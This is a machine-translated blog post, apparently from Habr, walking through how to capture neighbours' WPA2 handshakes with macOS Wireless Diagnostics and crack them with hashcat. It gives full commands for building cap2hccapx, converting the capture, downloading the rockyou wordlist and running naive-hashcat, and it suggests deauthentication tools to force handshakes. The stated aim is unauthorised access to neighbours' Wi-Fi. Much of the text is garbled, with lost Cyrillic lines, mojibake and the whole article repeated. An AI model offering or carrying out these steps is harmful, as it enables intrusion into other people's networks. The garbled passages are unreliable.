We get our neighbor's Wi-Fi using standard MacOS tools.
I have always been a fan of bugs and vulnerabilities "on the surface", I have always envied dudes who write exploits for the most protected operating systems, and I could only use scripts (the term from zero). However, my post about vulnerabilities in version control systems scored more than 1000 likes on Habré and remains the top1 post in the entire history of Habr, despite the fact that it was written 9 (!) Years ago.
And today I would like to show and tell on the fingers about such a thing as wardriving. Or rather, using standard MacOS tools, you can get passwords from Wi-Fi neighbors. The difficult one threw me into another apartment. Somehow, historically, I'm lazy. A couple of years ago, I already wrote that my laziness, the new apartment and the wire of Beeline (formerly Corbina) helped me find a bug in Beeline and have free internet on their network. "Today" is happening "like", I am at a new apartment, there is not even a wire, but neighbors have many networks.
Having hovered on spending mobile traffic, I decided that âneighbors need helpâ, and under âneighborsâ I had to enter myself ...
Once upon a time I was fond of wardriving, just before that, until I found the Beeline wire in an old apartment) There, too, there were many networks nearby and the first thing that occurred to me was that I needed wi-fi. Many years have passed since then. Updating my data about wardriving, I found a mention in the network that 90% of the work of the special utilities âtodayâ can be made standard MacOS services. Looking ahead, I would like to note that I am not the author of this method, I myself found it in a foreign internet, just, let's say, this is a free translation and a detailed, artistic description of the way to get wi-fi passwords using standard macos methods, no more.
')
You have to understand that having a Wi-Fi receiver, which you can find in any laptop today, you can âsniffâ all wireless traffic around you. Earlier, when the networks were open, it was enough to come to McDuck and in the evening you could get 100-200 akkov to classmates. Open network + lack of https did their job.
Now everything is more interesting, everyone is switching to https (taking this opportunity, I want to say hello to Lets Encypt . Beloved Lets Encypt, I'm on TV and say hello to you, thank you for being) and even forgot about WEP, everyone has WPA2. But, as you know, the sword was invented before the shield, and no WPA2 is an obstacle for a person who is hungry for the Internet and sees a bunch of Wi-Fi near him.
We continue. Having a Wi-Fi card, i.e. Any modern laptop, we can sniff traffic near us. But it is useless, because it is encrypted. The only thing that can be disassembled from it is metadata, such as the name of networks and so on, and handshake, i.e. authorization of users in the network. They occur every time a user connects to a wi-fi network. For example, when a neighbor comes home and his smartphone in his pocket clings to home wi-fi.
If quite rude, handshakes are a regular md5 type hash.
And yes, I lied in my first paragraph about âdecodingâ, this is a technical error and a substitution of concepts. Of course, it is impossible to decrypt the hash. It's like saying âtaxi licenseâ, knowing that taxi activity in the Russian Federation is not licensed. But just so convenient)
So here. All we need is to find handshakes among the traffic of the radio network around ourselves and âdecryptâ them. And there used to be a lot of software for all this. Someone was able to competently scan the radio channel, someone perfectly sniffed it into dumps, someone found hashes in the dumps, someone could break them. Now everything has become easier, thanks to Tim Cook. 90% of the work for third-party software makes the standard application "Wireless Diagnostics". Many have seen it - when there are problems with Wi-Fi, the Mac offers to check the network. Useless utility that gives tips like "reboot the router." Well, i.e. it seemed to me)
So, drove. Hold Alt and click on the Wi-Fi logo in the top bar. In general, Alt and click always opens additional options in MacOS, but this is a topic for a separate topic.
In addition to other additional info, which is sometimes very useful, we can launch the Wireless Diagnostics program. I think everyone who uses poppy remembers this window.
But we are interested in something else. Click on the menu item "Window" and see a set of additional utilities.
And right here there is everything that is needed, even more) We are specifically interested in 2 points. Scan and Analyzer. The first one will show us all the networks around with additional information, such as on which channel and on which frequency the network operates. The second point will allow you to sniff traffic on a specific channel and frequency.
By clicking on the âStartâ button in the Analyzer, the Wi-Fi card will switch to receive mode and start scanning the radio frequency around itself, the dump will be written to / var / tmp.
Files * .wcap are our dumps, which contain traffic that is useless for us and we need handshakes.
We must understand that we need to catch just handshakes. Those. we need to catch and sniff traffic when a neighbor comes home in the evening. Or, if you have another device on makosi, or any other axis, nukers will help you. Programs that send out fake deactivation commands. For example, JamWiFi . But this is if you really canât wait) In my experience, itâs enough just to run the Analyzer at 6 pm for an hour.
Next we need to put naive-hashcat and hashcat-utils .
âStopâ you say, âyou promised to break the neighborâs networks using standard methods?â) Ha! And you believed me? In fact, we used standard methods to do 90% of the work through the GUI. We already have hashes, all we need is to break them. I'm sure you can do everything with standard utilities, but it's easier to use hashcat. We collect software through brew or from sorts. First of all, we need to convert our dump, leaving only our hashes in it. This is the cap2hccapx binary from the package.
âŠ
, 2 , « ». naive-hashcat:
. 2000 , 7, . , 1080gtx 400 . 2 , . home-wifi.txt, :
. , , 7 ) wi-fi- . , , .
,Kali Linux MacOS .
.
And today I would like to show and tell on the fingers about such a thing as wardriving. Or rather, using standard MacOS tools, you can get passwords from Wi-Fi neighbors. The difficult one threw me into another apartment. Somehow, historically, I'm lazy. A couple of years ago, I already wrote that my laziness, the new apartment and the wire of Beeline (formerly Corbina) helped me find a bug in Beeline and have free internet on their network. "Today" is happening "like", I am at a new apartment, there is not even a wire, but neighbors have many networks.
Having hovered on spending mobile traffic, I decided that âneighbors need helpâ, and under âneighborsâ I had to enter myself ...
Once upon a time I was fond of wardriving, just before that, until I found the Beeline wire in an old apartment) There, too, there were many networks nearby and the first thing that occurred to me was that I needed wi-fi. Many years have passed since then. Updating my data about wardriving, I found a mention in the network that 90% of the work of the special utilities âtodayâ can be made standard MacOS services. Looking ahead, I would like to note that I am not the author of this method, I myself found it in a foreign internet, just, let's say, this is a free translation and a detailed, artistic description of the way to get wi-fi passwords using standard macos methods, no more.
')
Neighborhood Wi-Fi Passwords Principles
You have to understand that having a Wi-Fi receiver, which you can find in any laptop today, you can âsniffâ all wireless traffic around you. Earlier, when the networks were open, it was enough to come to McDuck and in the evening you could get 100-200 akkov to classmates. Open network + lack of https did their job.
Now everything is more interesting, everyone is switching to https (taking this opportunity, I want to say hello to Lets Encypt . Beloved Lets Encypt, I'm on TV and say hello to you, thank you for being) and even forgot about WEP, everyone has WPA2. But, as you know, the sword was invented before the shield, and no WPA2 is an obstacle for a person who is hungry for the Internet and sees a bunch of Wi-Fi near him.
We continue. Having a Wi-Fi card, i.e. Any modern laptop, we can sniff traffic near us. But it is useless, because it is encrypted. The only thing that can be disassembled from it is metadata, such as the name of networks and so on, and handshake, i.e. authorization of users in the network. They occur every time a user connects to a wi-fi network. For example, when a neighbor comes home and his smartphone in his pocket clings to home wi-fi.
If quite rude, handshakes are a regular md5 type hash.
This is really quite rude. The key there is obtained by 4096 rounds of SHA1. To be precise, the formula is: Key = PBKDF2 (HMAC â SHA1, passphrase, ssid, 4096, 256)thanks to jia3ep
By the way, you can see that the name of the point is mixed in, therefore, with a unique name, precomputations do not help. And this is the argument for changing the name of the point to your own.
And yes, I lied in my first paragraph about âdecodingâ, this is a technical error and a substitution of concepts. Of course, it is impossible to decrypt the hash. It's like saying âtaxi licenseâ, knowing that taxi activity in the Russian Federation is not licensed. But just so convenient)
So here. All we need is to find handshakes among the traffic of the radio network around ourselves and âdecryptâ them. And there used to be a lot of software for all this. Someone was able to competently scan the radio channel, someone perfectly sniffed it into dumps, someone found hashes in the dumps, someone could break them. Now everything has become easier, thanks to Tim Cook. 90% of the work for third-party software makes the standard application "Wireless Diagnostics". Many have seen it - when there are problems with Wi-Fi, the Mac offers to check the network. Useless utility that gives tips like "reboot the router." Well, i.e. it seemed to me)
We extract passwords. Neighbors hang;)
So, drove. Hold Alt and click on the Wi-Fi logo in the top bar. In general, Alt and click always opens additional options in MacOS, but this is a topic for a separate topic.
In addition to other additional info, which is sometimes very useful, we can launch the Wireless Diagnostics program. I think everyone who uses poppy remembers this window.
But we are interested in something else. Click on the menu item "Window" and see a set of additional utilities.
And right here there is everything that is needed, even more) We are specifically interested in 2 points. Scan and Analyzer. The first one will show us all the networks around with additional information, such as on which channel and on which frequency the network operates. The second point will allow you to sniff traffic on a specific channel and frequency.
By clicking on the âStartâ button in the Analyzer, the Wi-Fi card will switch to receive mode and start scanning the radio frequency around itself, the dump will be written to / var / tmp.
Files * .wcap are our dumps, which contain traffic that is useless for us and we need handshakes.
We must understand that we need to catch just handshakes. Those. we need to catch and sniff traffic when a neighbor comes home in the evening. Or, if you have another device on makosi, or any other axis, nukers will help you. Programs that send out fake deactivation commands. For example, JamWiFi . But this is if you really canât wait) In my experience, itâs enough just to run the Analyzer at 6 pm for an hour.
Next we need to put naive-hashcat and hashcat-utils .
âStopâ you say, âyou promised to break the neighborâs networks using standard methods?â) Ha! And you believed me? In fact, we used standard methods to do 90% of the work through the GUI. We already have hashes, all we need is to break them. I'm sure you can do everything with standard utilities, but it's easier to use hashcat. We collect software through brew or from sorts. First of all, we need to convert our dump, leaving only our hashes in it. This is the cap2hccapx binary from the package.
# hashcat-utils
git clone https://github.com/hashcat/hashcat-utils.git
Cloning into 'hashcat-utils'...
remote: Counting objects: 403, done.
remote: Total 403 (delta 0), reused 0 (delta 0), pack-reused 403
Receiving objects: 100% (403/403), 114.23 KiB | 61.00 KiB/s, done.
Resolving deltas: 100% (257/257), done.
#
cd hashcat-utils/src/ && make
rm -f ../bin/*
rm -f *.bin *.exe
cc -Wall -W -pipe -O2 -std=gnu99 -o cap2hccapx.bin cap2hccapx.c
cc -Wall -W -pipe -O2 -std=gnu99 -o cleanup-rules.bin cleanup-rules.c
âŠ
cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsr.bin strip-bsr.c
cc -Wall -W -pipe -O2 -std=gnu99 -o strip-bsn.bin strip-bsn.c
#
./cap2hccapx.bin /var/tmp/2018.01.25_00-37-45-GMT+3.wcap /var/tmp/home.hccapxâŠ
, 2 , « ». naive-hashcat:
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# osx
./build-hashcat-osx.sh
# wpa/wpa2 (134MB)
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# , , 2500 , WPA, naive-hashcat
HASH_FILE=/var/tmp/home.hccapx POT_FILE=home-wifi.txt HASH_TYPE=2500 ./naive-hashcat.sh
. 2000 , 7, . , 1080gtx 400 . 2 , . home-wifi.txt, :
. , , 7 ) wi-fi- . , , .
,
.
Source: https://habr.com/ru/post/347658/
All Articles